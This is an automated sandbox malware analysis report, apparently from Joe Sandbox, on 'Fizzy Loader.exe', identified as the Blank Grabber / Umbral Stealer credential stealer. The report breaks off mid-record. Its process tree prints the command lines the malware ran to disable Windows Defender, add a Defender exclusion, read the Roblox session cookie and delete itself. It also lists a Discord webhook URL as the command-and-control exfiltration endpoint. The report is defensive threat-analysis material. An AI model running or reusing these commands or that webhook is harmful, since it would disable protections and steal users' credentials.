Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Fizzy Loader.exe

Overview

General Information

Sample name:Fizzy Loader.exe
Analysis ID:1582592
MD5:b56af795f8b7edc6f35a9e905921ed0e
SHA1:c82cb0088bc9c93fd9a491ad278f410d44265a4d
SHA256:46a67cdc899f61ccb6324d187d56b389f720d72beb02594fd60fdc4a8ca62ab4
Tags:exeUmbralStealeruser-aachum
Infos:

Detection

Blank Grabber, Umbral Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Blank Grabber
Yara detected Umbral Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies the hosts file
Self deletion via cmd or bat file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses attrib.exe to hide files
Uses ping.exe to check the status of other devices and networks
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Fizzy Loader.exe (PID: 1708 cmdline: "C:\Users\user\Desktop\Fizzy Loader.exe" MD5: B56AF795F8B7EDC6F35A9E905921ED0E)
    • WMIC.exe (PID: 1996 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 1440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5080 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\Fizzy Loader.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 6656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5688 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4568 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 6156 cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1892 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 428 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 6552 cmdline: "wmic.exe" os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 4308 cmdline: "wmic.exe" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7156 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1308 cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 432 cmdline: "wmic" path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3560 cmdline: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\Fizzy Loader.exe" && pause MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 5656 cmdline: ping localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • cleanup
{"C2 url": "https://discord.com/api/webhooks/1323224754576166912/ngAQr5IRg8PVqlg_GePwPe46g-WcVmFR7-gQu1RH44lVF1JX9hv6jSy8rNgxBAU6LxYx", "Version": "v1.3"}
SourceRuleDescriptionAuthorStrings
Fizzy Loader.exeJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    Fizzy Loader.exeJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
      Fizzy Loader.exeINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
      • 0x31870:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
      • 0x319f6:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
      • 0x31a92:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
      SourceRuleDescriptionAuthorStrings
      C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scrJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scrJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scrINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
          • 0x31870:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
          • 0x319f6:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
          • 0x31a92:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
          SourceRuleDescriptionAuthorStrings
          00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
              00000000.00000002.2624137126.00000172B0CE9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                  00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 3 entries
                    SourceRuleDescriptionAuthorStrings
                    0.0.Fizzy Loader.exe.172aed80000.0.unpackJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                      0.0.Fizzy Loader.exe.172aed80000.0.unpackJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
                        0.0.Fizzy Loader.exe.172aed80000.0.unpackINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
                        • 0x31870:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
                        • 0x319f6:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
                        • 0x31a92:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

                        System Summary

                        barindex
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Fizzy Loader.exe", ParentImage: C:\Users\user\Desktop\Fizzy Loader.exe, ParentProcessId: 1708, ParentProcessName: Fizzy Loader.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe', ProcessId: 5688, ProcessName: powershell.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe